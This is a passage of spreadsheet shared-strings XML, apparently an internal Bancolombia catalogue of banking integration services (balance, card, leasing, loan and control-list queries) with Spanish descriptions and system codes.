  </si>
  <si>
    <t>Todo 1</t>
  </si>
  <si>
    <t>STI _x000D_
AW0922 _x000D_
GDE _x000D_
TP _x000D_
Allus</t>
  </si>
  <si>
    <t>Consulta Inversiones</t>
  </si>
  <si>
    <t>Este servicio tiene como propósito consultar la información que se encuentra asociada a producto de deposito virtual , cuenta con operaciones para consulta de tasas, listado de CDT's y detalle de CDT</t>
  </si>
  <si>
    <t>CDT _x000D_
NU0014001 _x000D_
DEVELOPSOATEST _x000D_
SVE _x000D_
AW0955001 _x000D_
NU0153001 _x000D_
NU0146001 _x000D_
NU0149001</t>
  </si>
  <si>
    <t>Consulta Limites De Endeudamiento</t>
  </si>
  <si>
    <t>Versión Inicial del Servicio Consulta Limites de Endeudamiento para la EVC Ciclo de Crédito</t>
  </si>
  <si>
    <t>DEVELOPSOATEST _x000D_
PRODUCTORCONSUMIDOR _x000D_
APICONNECT</t>
  </si>
  <si>
    <t>Consulta Listas De Control</t>
  </si>
  <si>
    <t>Este servicio tiene la capacidad de consultar a un cliente en una categoría y subcategoría de listas de control. El cliente puede ser persona Natural o Jurídica. Este servicio no contempla el retiro de clientes de estas listas.</t>
  </si>
  <si>
    <t>BVC-Legados_Clientes legados_ISBVC0011</t>
  </si>
  <si>
    <t>Este servicio tiene como alcance consultar el estado de un cliente en listas de control</t>
  </si>
  <si>
    <t>AW1177 _x000D_
AW1373 _x000D_
SLT _x000D_
AW0856 _x000D_
AW1294001 _x000D_
NU0129001 _x000D_
AW1176 _x000D_
AW1285001 _x000D_
AW1206001 _x000D_
AW1258001 _x000D_
AW1170 _x000D_
AW1281002 _x000D_
NU0034001 _x000D_
AW0638 _x000D_
AW0922 _x000D_
AW1302001 _x000D_
AW1203001 _x000D_
NU0017001 _x000D_
AW0998 _x000D_
AW1258011 _x000D_
AW1258002 _x000D_
AW0360009 _x000D_
NU0064001 _x000D_
AW1097001 _x000D_
AW0683001 _x000D_
NU0142001 _x000D_
NU0143001 _x000D_
AW1011 _x000D_
AW1281003 _x000D_
AW1128 _x000D_
NU0139001 _x000D_
NU0035001 _x000D_
AW1311 _x000D_
AW1183001 _x000D_
AW1315014 _x000D_
AW1081001 _x000D_
NU0163001 _x000D_
AW1151001 _x000D_
AW0682001 _x000D_
AW1333002 _x000D_
AW1279001 _x000D_
AW1277001 _x000D_
AW1365 _x000D_
AW0434001 _x000D_
NU0063001 _x000D_
NU0135001 _x000D_
AW0661003 _x000D_
NU0046001 _x000D_
AW1480001 _x000D_
AW0629001 _x000D_
AW0955001</t>
  </si>
  <si>
    <t>Consulta Llavero Cliente</t>
  </si>
  <si>
    <t>El servicio Consulta Llavero Cliente, es un servicio que permite consultar una llave de identificación especifica del cliente según una identificación de entrada. Es decir, que de un tipo y número de identificación puedo obtener la llave MDM del cliente o en otro caso, a partir de la llave MDM puedo consultar cual es la llave CIF. Permite consultar la llave específica a partir de: la llave MDM, llave CIF, llave CRM y el tipo/número de identificación. Y las llaves resultantes pueden ser: la llave MDM, llave CIF, llave CRM. Esta información que retornar el servicio corresponde a datos maestros de los clientes de Colombia.</t>
  </si>
  <si>
    <t>AW0748001 _x000D_
AW1240001 _x000D_
AW1281002 _x000D_
NU0032001 _x000D_
NU0021001 _x000D_
AW1074001 _x000D_
SVP _x000D_
NU0038001 _x000D_
NU0014001 _x000D_
AW1165 _x000D_
AW1281003 _x000D_
AW1011 _x000D_
NU0035001 _x000D_
AW1218001 _x000D_
AW0661003</t>
  </si>
  <si>
    <t>Consulta Llavero Comercial</t>
  </si>
  <si>
    <t>El servicio: Consulta Llavero Comercial, es un servicio que permite consultar información de las llaves de los empleados comerciales del banco que manejan atención al cliente. Esta información son llaves de los sistemas donde se encuentra el empleado, tal como CIF y CRM. Algunos de los datos que retorna el servicio son: llave empleado CRM, llave empleado CIF (EM), llave MDM del empleado como cliente, llave CRM del empleado como cliente, llave CIF del empleado como cliente, tipo y número de documento original del empleado, entre otros.  Un empleado de atención al cliente puede llegar a ser por ejemplo un gerente comercial o Trader de un cliente.</t>
  </si>
  <si>
    <t>AW1074001</t>
  </si>
  <si>
    <t>Consulta Llaves Cliente</t>
  </si>
  <si>
    <t>El servicio permite que, con el tipo y número de documento de un cliente de filiales del exterior, se pueda consultar el valor de la llave CRM o las llaves Finacle de dicho cliente. Las filiales del exterior pueden ser: Bancolombia Panamá, Bancolombia Puerto Rico y Cayman. Un cliente en filiales del exterior puede tener una llave CRM, pero a su vez puede tener varias llaves Finacle, ya que, si el cliente se encuentra en varias filiales, entonces tendrá una llave Finacle por filial.</t>
  </si>
  <si>
    <t>AW0842001 _x000D_
AW1074001 _x000D_
AW1185001 _x000D_
AW0360010</t>
  </si>
  <si>
    <t>Consulta Lme Finacle Filiales</t>
  </si>
  <si>
    <t>El servicio ConsultaLmeFinacleFiliales permite la consulta de Límite Máximo de Endeudamiento de un cliente con operaciones específicas en Finacle de Filiales del Exterior.</t>
  </si>
  <si>
    <t xml:space="preserve">
Finacle - F.E_Panama_AW0709001</t>
  </si>
  <si>
    <t>AW1176</t>
  </si>
  <si>
    <t>Consulta Lme Finacle Trade</t>
  </si>
  <si>
    <t>El servicio ConsultaLmeFinacleTrade permite la consulta de Límite Máximo de Endeudamiento de un cliente con operaciones específicas en Finacle Trade Colombia.</t>
  </si>
  <si>
    <t>AW1176 _x000D_
DEVELOPSOATEST</t>
  </si>
  <si>
    <t>Consulta Lme Leasing</t>
  </si>
  <si>
    <t>El alcance del servicio consiste en la consulta por numero de identificación, de información desagregada correspondiente al limite Maximo de endeudamiento de un cliente Leasing.</t>
  </si>
  <si>
    <t>LEASING</t>
  </si>
  <si>
    <t>Administración del ciclo de vida del activo</t>
  </si>
  <si>
    <t>Juan Pablo Bahamon Betancur</t>
  </si>
  <si>
    <t>Delfin Web_menú de módulos_AW0748001</t>
  </si>
  <si>
    <t>AW1176 _x000D_
AW0922</t>
  </si>
  <si>
    <t>Consulta Lotes De Pago</t>
  </si>
  <si>
    <t xml:space="preserve">El servicio Consulta Lotes de Pago permitirá conocer la información de los lotes cargador por un cliente pagador. Contiene la información de los encabezados de los archivos que han sido cargados en los últimos tres meses con diferentes opciones de filtro. La información siempre deberá ser consultada a partir de un rango de fechas, cuenta pagadora e información del lote como su monto, tipo de pago o canal por el que fue cargado. </t>
  </si>
  <si>
    <t>PRODUCTORCONSUMIDOR _x000D_
NU0153001</t>
  </si>
  <si>
    <t>Consulta Marcaciones Personas</t>
  </si>
  <si>
    <t>Este servicio permite realizar la consulta de las marcaciones de las cuentas que una persona tiene en CIFIN, partiendo del número de identificación, tipo de Identificación, código Producto y motivo Consulta se retorna los datos generales del cliente, el estado de la cuenta (producto) y los demás campos correspondientes a la marcación de cuenta por GMF o por CATS.</t>
  </si>
  <si>
    <t>TransUnion</t>
  </si>
  <si>
    <t>AW1227001</t>
  </si>
  <si>
    <t>Consulta Metadata Documental</t>
  </si>
  <si>
    <t>El servicio Consulta Metadata Documental permitirá a los consumidores realizar consultas, para determinar la existencia o no de documentos al interior del grupo Bancolombia y así evitar, solicitarles a los clientes estos documentos._x005F_x000D_ El servicio está pensado para mostrarle a los consumidores información relevante sobre los documentos tales como: tipo del documento, subtipo del documento, dueño del documento, fecha de indexación del documento entre otros, adicionalmente permite elegir la opción de visualizar o no un link donde los documentos consultados pueden ser descargados, este servicio devuelve 0 o muchos documentos de acuerdo a los filtros que se realicen sobre este.</t>
  </si>
  <si>
    <t>AW1176 _x000D_
AW0638 _x000D_
AW1272001 _x000D_
NU0001 _x000D_
AW1133 _x000D_
AW0659 _x000D_
AW1203001 _x000D_
NU0142001 _x000D_
AW1218001</t>
  </si>
  <si>
    <t>Consulta Mmf Factoring</t>
  </si>
  <si>
    <t>El alcance del servicio consiste en la consulta por numero de identificación, de datos correspondientes al monto máximo de factorura de un cliente Factoring.</t>
  </si>
  <si>
    <t>Sucursal Virtual_Sucursal Virtual Factoring_AW0422001</t>
  </si>
  <si>
    <t>Consulta Modificacion Endeudamiento</t>
  </si>
  <si>
    <t>El servicio de Consulta Modificaciones Endeudamiento nos brindará la capacidad con su modalidad, tipo y numero de identificación nos diga para que producto se le podrá aplicar modificación, validando así el vector mora, calificación y marca 026.</t>
  </si>
  <si>
    <t>AW01010 _x000D_
AW0748001 _x000D_
SUF _x000D_
PRODUCTORCONSUMIDOR _x000D_
BVL _x000D_
AW1010001</t>
  </si>
  <si>
    <t>Consulta Motivos Transaccion</t>
  </si>
  <si>
    <t>Permite en el proceso de compra y venta de divisas consultar los posibles motivos de la transacción.</t>
  </si>
  <si>
    <t>Consulta Movimiento Cuenta Ahorro Deposito</t>
  </si>
  <si>
    <t>El servicio Consulta Movimiento Cuenta Ahorro Deposito tiene como objetivo realizar las consultas de los Movimientos de las cuentas depósitos (Cuenta Ahorro) de manera genérica, de los clientes pertenecientes a la Banca Personas, Pymes y Empresas a través de los diferentes canales físicos y virtuales del banco.</t>
  </si>
  <si>
    <t>Consulta Movimiento Cuenta Corriente Deposito</t>
  </si>
  <si>
    <t>El servicio tiene como objetivo realizar las consultas de los Movimientos de las cuentas depósitos (Cuenta Corriente) de manera genérica, de los clientes pertenecientes a la Banca Personas, Pymes y Empresas a través de los diferentes canales físicos y virtuales del banco.</t>
  </si>
  <si>
    <t>Consulta Movimiento Depositos</t>
  </si>
  <si>
    <t xml:space="preserve">El servicio ConsultaMovimientoDepositos V.1.0 tiene como objetivo realizar las consulta de los Movimientos de las cuentas depósitos (Cuenta Ahorro y Corriente) de los clientes pertenecientes a la Banca Personas, Pymes y Empresas a través de los diferentes canales físicos y virtuales del banco. </t>
  </si>
  <si>
    <t>AW1272001 _x000D_
NU0010001 _x000D_
AW1218001</t>
  </si>
  <si>
    <t>Consulta Movimientos Bolsillos</t>
  </si>
  <si>
    <t>Bolsillos Bancolombia permite separar los recursos de una cuenta de ahorros para mantener diferentes ahorros en bolsillos separados con una meta en específico, por ejemplo, ahorros para viajes, salud, alimentación, transporte etc.  El servicio ConsultaMovimientosBolsillos habilita las capacidades de consulta relacionada con los movimientos que puede tener un bolsillo en particular, por ejemplo, adiciones, retiros o transferencias.</t>
  </si>
  <si>
    <t>PRODUCTORCONSUMIDOR _x000D_
NU0021001 _x000D_
NU0146001 _x000D_
NU0149001</t>
  </si>
  <si>
    <t>Consulta Movimientos Tarjeta Credito</t>
  </si>
  <si>
    <t xml:space="preserve"> El servicio Consulta Movimientos Tarjeta de Crédito tiene como objetivo realizar las consultas de los Movimientos de las tarjetas de crédito de un cliente de una manera histórica y los últimos 3 días._x005F_x000D_ _x005F_x000D_ El servicio permitirá consultar por el número de la tarjeta de crédito de forma completa, y con los últimos 4 dígitos de la Tarjeta de crédito en el caso de que por seguridad se deba utilizar.</t>
  </si>
  <si>
    <t>Consulta Numeral Cambiario</t>
  </si>
  <si>
    <t>El servicio Consulta Numeral Cambiario permitirá realizar la consulta de los numerales cambiarios a partir de la identificación del cliente, con el tipo de persona y transacción. El proceso para la compra es el siguiente:</t>
  </si>
  <si>
    <t>DEVELOPSOATEST _x000D_
NU0163001 _x000D_
PRODUCTORCONSUMIDOR</t>
  </si>
  <si>
    <t>Consulta Obligaciones Sufi</t>
  </si>
  <si>
    <t xml:space="preserve">El servicio ConsultaObligacionesSufi permitirá a los consumidores consultar las Obligaciones que tiene una persona con SUFI. Se nombra y se deja abierto el servicio como “consulta” con el fin de adicionar las capacidades que se requieran para consultas relacionadas con obligaciones como consultarDetalleObligacion etc. </t>
  </si>
  <si>
    <t>Servicio Web Obligacion Sufi_AW1082001</t>
  </si>
  <si>
    <t>AW1209001 _x000D_
ISSU20003 _x000D_
AW1097001 _x000D_
NU0093001</t>
  </si>
  <si>
    <t>El servicio ConsultaObligacionesSufi permitirá a los consumidores consultar las Obligaciones que tiene una persona con SUFI.</t>
  </si>
  <si>
    <t>El servicio ConsultaObligacionesSufi permitirá a los consumidores consultar las Obligaciones que tiene una persona con SUFI. Se nombra y se deja abierto el servicio como “consulta” con el fin de adicionar las capacidades que se requieran para consultas relacionadas con obligaciones como consultarDetalleObligacion etc.</t>
  </si>
  <si>
    <t>AW1097001 _x000D_
NU0021001 _x000D_
NU0093001 _x000D_
ISSU20003 _x000D_
NU0204001</t>
  </si>
  <si>
    <t>Consulta Operacion Leasing</t>
  </si>
  <si>
    <t>El servicio de Consulta Operación Leasing permite a los consumidores obtener la información de las operaciones: Producto, estado, condiciones financieras, condiciones generales de la opción.</t>
  </si>
  <si>
    <t>AW0360006</t>
  </si>
  <si>
    <t>Consulta Operacion Leasing Financiero</t>
  </si>
  <si>
    <t xml:space="preserve">El servicio Consulta Operación Leasing Financiero permitirá a los consumidores consultar diferente información relacionada con las operaciones de leasing financiero en estados de anticipo, definitivos o cancelados. </t>
  </si>
  <si>
    <t xml:space="preserve">
LEASING_AW1171001</t>
  </si>
  <si>
    <t>Consulta Pago En Efectivo</t>
  </si>
  <si>
    <t>El servicio Consulta Pago En Efectivo permitirá obtener información de los pagos, la información podrá ser buscada por pagador o beneficiario, retornando información como tal del pago e información asociada de como se estableció el pago.</t>
  </si>
  <si>
    <t>PRODUCTORCONSUMIDOR _x000D_
AW1151001 _x000D_
NU0021001</t>
  </si>
  <si>
    <t>Consulta Pago Obligaciones Sufi</t>
  </si>
  <si>
    <t>El servicio de tarea ConsultaPagoObligacionesSufi es una composición entre los servicios de datos del cliente y de la consulta básica de obligaciones, que permite obtener los datos necesarios para que un cliente de Sufi pueda consultar los datos de sus próximos pagos a realizar desde una línea telefónica bajo la tecnología de respuesta de voz interactiva (IVR), este servicio de tarea se hace bajo el contexto del proveedor del Konecta.</t>
  </si>
  <si>
    <t>ISSU20003</t>
  </si>
  <si>
    <t>Consulta Pago Operacion Leasing</t>
  </si>
  <si>
    <t>El servicio de Consulta Pago Operación Leasing permite a los consumidores obtener la información de los pagos realizados para una obligación, sean de Leasing Financiero, Leasing Arrendamiento operativo u otro tipo de Leasing.</t>
  </si>
  <si>
    <t>Consulta Pago Programado</t>
  </si>
  <si>
    <t xml:space="preserve">La Consulta Pagos Programado permitirá visualizar el detalle de una pago programado asociado a un pagador, se obtendra información del convenio, su forma de pago, referencias y su programación. </t>
  </si>
  <si>
    <t>Consulta Pagos</t>
  </si>
  <si>
    <t>El servicio ConsultaPagos tiene el objetivo de realizar la consulta general y detallada del histórico de lotes de pagos, que ha realizado una empresa afiliada a sus beneficiarios (proveedor o empleado).</t>
  </si>
  <si>
    <t>AW1170 _x000D_
AW1258011</t>
  </si>
  <si>
    <t>Consulta Pagos Operacion Leasing Financiero</t>
  </si>
  <si>
    <t>El servicio Consulta Pagos Operación Leasing Financiero permitirá a los consumidores consultar los diferentes pagos: al día, pagos anteriores, pagos futuros o en mora para las operaciones en estado definitiva o en anticipo</t>
  </si>
  <si>
    <t>Consulta Partner Listas De Control</t>
  </si>
  <si>
    <t>La consulta en listas de control para partners, permite a los aliados estratégicos del grupo Bancolombia verificar si un potencial cliente se encuentra reportado en alguna categoría de alerta o bloqueo de listas de control. El consumo de esta capacidad está sujeta previa autorización del equipo jurídico asignado al proyecto que desea consumirlo y siguiendo todo el modelo operativo para APIs partners.</t>
  </si>
  <si>
    <t>NU0063001 _x000D_
DEVELOPSOATEST</t>
  </si>
  <si>
    <t>Consulta Plan Pago Operacion Leasing</t>
  </si>
  <si>
    <t>El servicio de Consulta Plan de Pago Operación Leasing permite a los consumidores obtener la información de los planes de pagos acordados para una obligación sean de Leasing Financiero, Leasing Arrendamiento operativo u otro tipo de Leasing.</t>
  </si>
  <si>
    <t>Consulta Prestamos</t>
  </si>
  <si>
    <t>Es un servicio que permite consultar el detalle de un prestamo</t>
  </si>
  <si>
    <t>PRODUCTORCONSUMIDOR _x000D_
AW1313001 _x000D_
AW1294001</t>
  </si>
  <si>
    <t>Consulta Producto Depositos</t>
  </si>
  <si>
    <t>Este servicio permitirá consultar las cuentas asociadas a un cliente.</t>
  </si>
  <si>
    <t>Bankvision - BVC_Matriz MIT_ISBVC0009</t>
  </si>
  <si>
    <t>AW1177 _x000D_
AW0937 _x000D_
ELIBOM _x000D_
AW1285001 _x000D_
AW0856 _x000D_
AW0638 _x000D_
BSN _x000D_
AW1287 _x000D_
AW1128 _x000D_
AW1011</t>
  </si>
  <si>
    <t>Consulta Producto Tarjetas</t>
  </si>
  <si>
    <t>Este servicio permitirá consultar el listado de las tarjetas de crédito de un cliente específico la cual contiene filtros de acuerdo a lo solicitado.</t>
  </si>
  <si>
    <t>AW01065 _x000D_
AW1176 _x000D_
BSN _x000D_
AW1170</t>
  </si>
  <si>
    <t>Consulta Productos Cliente Personas</t>
  </si>
  <si>
    <t>El Servicio permite obtener información detallada de la relación del cliente con sus productos y las personas relacionadas a sus productos(relacionados).   La relación cliente productos devuelve cuales son los productos que un cliente tiene asociado, su porcentaje de participación, la oficina dueña, el tipo de relación que tiene con el producto, etc., agrupado por tipo y número.  Un relacionado es cualquier persona que tenga participación con los productos de un cliente, por ejemplo: un titular, un avalista, un deudor, un cotitular, un beneficiario, etc.</t>
  </si>
  <si>
    <t>AW1294001 _x000D_
SVP _x000D_
AW1218001</t>
  </si>
  <si>
    <t>Consulta Productos Consolidados</t>
  </si>
  <si>
    <t>Este servicio permite a los clientes consultar la información de los siguientes productos: cuentas de depósitos (Ahorros y Corrientes), tarjetas de crédito, préstamos, créditos hipotecarios y CDTs. El nombre de este servicio hace referencia a Productos Consolidados, porque permite al cliente buscar información de casi todos sus productos que se encuentran que tienen en el banco.</t>
  </si>
  <si>
    <t>Legacy y MFT</t>
  </si>
  <si>
    <t>STI - Sistema Transaccional de Integración_Sistema Transaccional de Integración_ISSTI0002</t>
  </si>
  <si>
    <t>Consulta Productos Del Cliente</t>
  </si>
  <si>
    <t>El servicio permitirá la consulta de información de los productos de un cliente de factoring específico, en varios niveles de detalle.</t>
  </si>
  <si>
    <t>AW0922 _x000D_
AW0611001 _x000D_
TP _x000D_
Allus _x000D_
AW1294001 _x000D_
NU0084001</t>
  </si>
  <si>
    <t>Consulta Productos InvestBot</t>
  </si>
  <si>
    <t xml:space="preserve">El servicio Consulta Productos InvestBot permite consular las cuentas depósitos, fondos de inversión colectiva (solo para Valores Bancolombia) y cuentas multiproductos activas de un cliente.  </t>
  </si>
  <si>
    <t>Sitio Transaccional_Sitio Transaccional_AW0638001</t>
  </si>
  <si>
    <t>Consulta Productos Pagos Cliente</t>
  </si>
  <si>
    <t>BSN</t>
  </si>
  <si>
    <t>Consulta Riesgo Por Cartera</t>
  </si>
  <si>
    <t xml:space="preserve">El servicio de consulta riesgo por cartera estará en capacidad de indicar la calificación de cliente y sus obligaciones catalogadas por tipo de cartera. 
La calificación hace referencia a como se ha evaluado el comportamiento de un cliente en el banco, y las obligaciones, son los el detalle de las deudas o productos que tiene con el banco. </t>
  </si>
  <si>
    <t>Consulta Saldos Consolidados</t>
  </si>
  <si>
    <t>El servicio ConsultaSaldosConsolidados proporciona a los consumidores, capacidades para realizar las diferentes transacciones no monetarias sobre las cuentas deposito (Ahorro/Corriente) y plazos fijos.</t>
  </si>
  <si>
    <t>Consulta Saldos Consolidados Filiales</t>
  </si>
  <si>
    <t>El servicio Consulta Saldos Consolidados Filiales permitirá a los diferentes consumidores poder obtener los saldos consolidados para todos los tipos de productos que posea el cliente en Finacle (CAA: Cuentas corrientes, SBA: Cuenta de ahorros, LAA: Préstamo retail, CLA: Préstamo corporativo y TDA: Plazos fijos) en las diferentes Filiales. El consolidado total de los saldos de todas las Filiales lo tendrá que realizar el consumidor del servicio en caso tal que lo requiera</t>
  </si>
  <si>
    <t>Consulta Saldos Creditos</t>
  </si>
  <si>
    <t xml:space="preserve">Este servicio permitirá a los diferentes consumidores poder obtener los diferentes saldos de manera detallada para los tipos de productos LAA: Préstamo retail, CLA: Préstamo corporativo que posee el cliente en las Filiales del exterior. </t>
  </si>
  <si>
    <t>Hub de Información_Entrega de informacion_AW0846001</t>
  </si>
  <si>
    <t>Consulta Saldos Cuentas Depositos</t>
  </si>
  <si>
    <t>El servicio tiene como objetivo realizar las consultas de los saldos de las cuentas depósitos (Cuenta Ahorro y Cuenta Corriente) de manera genérica, de los clientes pertenecientes a la Banca Personas, Pymes y Empresas a través de los diferentes canales físicos y virtuales del banco.</t>
  </si>
  <si>
    <t>AW1170 _x000D_
AW1165</t>
  </si>
  <si>
    <t>El servicio permite consultar el listado de las cuentas (Cuentas de ahorro y Cuentas Corriente) activas de un cliente Bancolombia.</t>
  </si>
  <si>
    <t>FINACLE 10.6_CREDITO HIPOTECARIO_AW1010001</t>
  </si>
  <si>
    <t>NU0017001 _x000D_
AW0856 _x000D_
AW1294001 _x000D_
AW1316001 _x000D_
AW1169 _x000D_
AW1170 _x000D_
NU0014001 _x000D_
AW1165 _x000D_
AW1302001 _x000D_
AW1011 _x000D_
SVE _x000D_
AW1316</t>
  </si>
  <si>
    <t>AW1177 _x000D_
AW0638 _x000D_
BSN _x000D_
AW1269001 _x000D_
AW1272001 _x000D_
AW1170</t>
  </si>
  <si>
    <t xml:space="preserve">Este servicio permitirá a los diferentes consumidores poder obtener los diferentes saldos de manera detallada para los tipos de productos: CAA: Cuentas corrientes, SBA: Cuenta de ahorros que posea el cliente en las Filiales del Exterior. </t>
  </si>
  <si>
    <t>AW1185001 _x000D_
AW0360010</t>
  </si>
  <si>
    <t>Consulta Saldos Plazos Fijos</t>
  </si>
  <si>
    <t>Este permitirá a los diferentes consumidores poder obtener los diferentes saldos de forma detallada para los tipos de productos TDA: Plazos fijos que posee el cliente en las Filiales del Exterior.</t>
  </si>
  <si>
    <t>Consulta Saldos Productos Consolidados</t>
  </si>
  <si>
    <t xml:space="preserve">El servicio Consulta Saldos Productos Consolidados permitirá a los diferentes consumidores poder consultar los saldos consolidados para todos los tipos de productos que posea el cliente en Finacle como (CAA: Cuentas corrientes, SBA: Cuenta de ahorros, LAA: Préstamo retail, CLA: Préstamo corporativo y TDA: Plazos fijos). </t>
  </si>
  <si>
    <t>SAP CRM_AW0682001</t>
  </si>
  <si>
    <t>Consulta Tarjetas Credito</t>
  </si>
  <si>
    <t>El servicio ConsultaTarjetasCredito permite consultar la información de tarjetas de crédito, ya sea asociadas a un cliente o por número de tarjeta, donde se podrá retornar información de estados, bloqueos, saldos, deudas y fechas de la tarjeta.</t>
  </si>
  <si>
    <t>AW1285001 _x000D_
AW1294001 _x000D_
AW1316001 _x000D_
AW1272001 _x000D_
AW1165 _x000D_
NU0019001 _x000D_
NU0064001 _x000D_
AW1250 _x000D_
NU0103001 _x000D_
AW1316 _x000D_
AW1218001</t>
  </si>
  <si>
    <t>Este servicio permite realizar diferentes tipos de consultas asociadas a las tarjetas de crédito, los cuales se listan a continuación.  • Listar tarjetas activas de un cliente (CONSTRUCCION) • Consultar datos de un tarjetahabiente (PRODUCCION) • Consultar los planes de pago de una tarjeta (CONSTRUCCION) • Consultar el detalle de una tarjeta (CONSTRUCCION)• Consultar el código de seguridad de una tarjeta (CONSTRUCCION)</t>
  </si>
  <si>
    <t>SAP ERP_FI-AP (Accounts Payable)_AW0541001</t>
  </si>
  <si>
    <t>NU0021001 _x000D_
NU0100001 _x000D_
NU0101001 _x000D_
AW1405001 _x000D_
PRODUCTORCONSUMIDOR _x000D_
DEVELOPSOATEST _x000D_
AW1316001 _x000D_
AW0955001 _x000D_
AW1184 _x000D_
AW1151001 _x000D_
NU0146001 _x000D_
NU0153001 _x000D_
NU0149001 _x000D_
AW1184003</t>
  </si>
  <si>
    <t>Consulta Tarjetas Debito</t>
  </si>
  <si>
    <t>Este servicio permite realizar las diferentes consultas relacionadas a una tarjeta débito.</t>
  </si>
  <si>
    <t>Konivin - Vennko</t>
  </si>
  <si>
    <t>NU0021001 _x000D_
NU0019001 _x000D_
NU0103001</t>
  </si>
  <si>
    <t>Este servicio permite realizar diferentes tipos de consultas asociadas a las tarjetas débito, los cuales se listan a continuación. 
• Listar las tarjetas activas de un cliente (PRODUCCION) 
• Listar las tarjetas pendientes por activar (CONSTRUCCION)
• Listar las tarjetas canceladas (CONSTRUCCION) 
• Consultar datos tarjetahabiente (PRODUCCION)
• Consultar código de seguridad (CONSTRUCCION)
• Listar las tarjetas activas de un cliente (PRODUCCION) 
• Listar las tarjetas pendientes por activar (CONSTRUCCION)
• Listar las tarjetas canceladas (CONSTRUCCION) 
• Consultar datos tarjetahabiente (PRODUCCION)
• Consultar código de seguridad (CONSTRUCCION)</t>
  </si>
  <si>
    <t>NU0021001 _x000D_
NU0100001 _x000D_
NU0101001 _x000D_
PRODUCTORCONSUMIDOR _x000D_
NU0091001 _x000D_
DEVELOPSOATEST _x000D_
NU0104001 _x000D_
AW1184 _x000D_
AW1184003</t>
  </si>
  <si>
    <t>Consulta Tarjetas Del Cliente</t>
  </si>
  <si>
    <t>El servicio consulta tarjetas del cliente, traerá todas las tarjetas activas que tiene el cliente (Debito, crédito y virtuales), con las condiciones propias del canal de Billetera Móvil._x005F_x000D_ Nota:  Este servicio lo expone un servidor de  Canal Billetera y se expone en IIB10</t>
  </si>
  <si>
    <t>AW1189001 _x000D_
AW1170</t>
  </si>
  <si>
    <t>Consulta Tarjetas PYME</t>
  </si>
  <si>
    <t>El servicio ConsultaTarjetasPYME permite consultar la información de tarjetas de crédito para PYME. Permite listar las tarjetas PYME de un cliente o consultar los saldos consolidados de las tarjetas asociadas a un cliente PYME.</t>
  </si>
  <si>
    <t>APIC _x000D_
AW1176 _x000D_
AW1285001 _x000D_
AW1294001 _x000D_
NU0114001 _x000D_
AW1287</t>
  </si>
  <si>
    <t>Consulta Tasa</t>
  </si>
  <si>
    <t>El servicio de ConsultaTasa tiene como objetivo consultar la tasa de la moneda extranjera, filtrando por una moneda origen y una moneda destino.</t>
  </si>
  <si>
    <t>Consulta Tasa Credito</t>
  </si>
  <si>
    <t>Este servicio cuenta con la capacidad consultar los diferentes rangos de tasas de interés, montos y plazos, entre otros detalles que aplican para un plan de crédito de consumo en función algunas características del cliente y del crédito solicitado.</t>
  </si>
  <si>
    <t>NU0102001 _x000D_
AW1285001 _x000D_
AW0856 _x000D_
AW1313</t>
  </si>
  <si>
    <t>El servicio permite consultar las tasas ofrecidas para créditos de consumo (libre inversión).</t>
  </si>
  <si>
    <t>AW0937 _x000D_
AW0856</t>
  </si>
  <si>
    <t>Consulta Tasa De Cambio</t>
  </si>
  <si>
    <t>Servicio que permite consultar todas aquellas tasas de cambio que a hoy se manejan en el banco, tales como tasa digital, tasa plena, tasa EBS, TRM, entre otras.</t>
  </si>
  <si>
    <t>SVP _x000D_
AW1011 _x000D_
AW0360</t>
  </si>
  <si>
    <t>Consulta TCRM</t>
  </si>
  <si>
    <t>Este servicio tiene como alcance exponer la TCRM que la SuperIntendencia Financiera brinda por medio de un Web Services, para que cualquier aplicación o proceso de la Organización la pueda consultar en tiempo real.</t>
  </si>
  <si>
    <t>AW0937 _x000D_
AW1176 _x000D_
AW1081001</t>
  </si>
  <si>
    <t>Consulta Transacciones Prestamo</t>
  </si>
  <si>
    <t>Consulta general y detallada de las transacciones de un prestamo</t>
  </si>
  <si>
    <t>PRODUCTORCONSUMIDOR _x000D_
DEVELOPSOATEST</t>
  </si>
  <si>
    <t>Consulta Variables Precalculadas Riesgos</t>
  </si>
  <si>
    <t>Permite tomar de la BD de Riesgos, parte de las variables que requiere Motor para el proceso de aprobación en el Flujo de crédito de Consumo e Inmobiliario</t>
  </si>
  <si>
    <t>AW1097001 _x000D_
AW1081001</t>
  </si>
  <si>
    <t>Consultar Centrales De Riesgo</t>
  </si>
  <si>
    <t>Componente que permite realizar la integración entre Bizagi y APM para ir a obtener la aprobación de un solicitante frente a las centrales de riesgo.</t>
  </si>
  <si>
    <t>AW0922 _x000D_
AW0856</t>
  </si>
  <si>
    <t>Consultar Cheques</t>
  </si>
  <si>
    <t>El usuario desde la sucursal virtual de empresa ó persona a partir de una cuenta del cliente, podrá consultar el estado de los cheques relacionados a una chequera a partir de una cuenta del cliente perteneciente a Filiales del exterior (Miami, Cayman, Panamá y Puerto Rico).</t>
  </si>
  <si>
    <t>Consultar Cheques Consignados</t>
  </si>
  <si>
    <t xml:space="preserve">Permite consultar la información de los cheques consignados en la cuenta especificada por el cliente, cuentas pertenecientes a cuenta de ahorros o cuenta corriente pertenecientes a Filiales de Exterior._x005F_x000D_ </t>
  </si>
  <si>
    <t>Consultar Clientes Precalculados</t>
  </si>
  <si>
    <t>El servicio permite identificar si una persona se encuentra en la base de clientes con créditos precalculados y posee un cupo aprobado.</t>
  </si>
  <si>
    <t>AW1097001 _x000D_
AW1081001 _x000D_
AW0939</t>
  </si>
  <si>
    <t>Consultar Cobro Comision</t>
  </si>
  <si>
    <t>Permitir realizar la consulta de cobro de comisión que se aplica a una transacción realizada por un cliente, o consultada antes de realizar la transacción.</t>
  </si>
  <si>
    <t>confirmar EVC dueña del servicio</t>
  </si>
  <si>
    <t>Consultar Condiciones Pago Leasing</t>
  </si>
  <si>
    <t>Servicio utilizado por el proyecto de Leasing Habitacional para la consulta de condiciones de pago de un cliente</t>
  </si>
  <si>
    <t>Consultar Credito Hipotecario</t>
  </si>
  <si>
    <t>El servicio expone capacidades que permiten consultar los proyectos asociados a un cliente constructor, así como los de un grupo económico o fiducias relacionados. Adicionalmente, permite la consulta de obligaciones asociadas a un proyecto hipotecario en particular y movimientos que presenten dichas obligaciones en un rango de fechas específico.</t>
  </si>
  <si>
    <t>Hipotecario</t>
  </si>
  <si>
    <t>Martha Luz Pardo</t>
  </si>
  <si>
    <t>SAI _x000D_
SVE _x000D_
SCI _x000D_
SVP _x000D_
NU0004001 _x000D_
AUD</t>
  </si>
  <si>
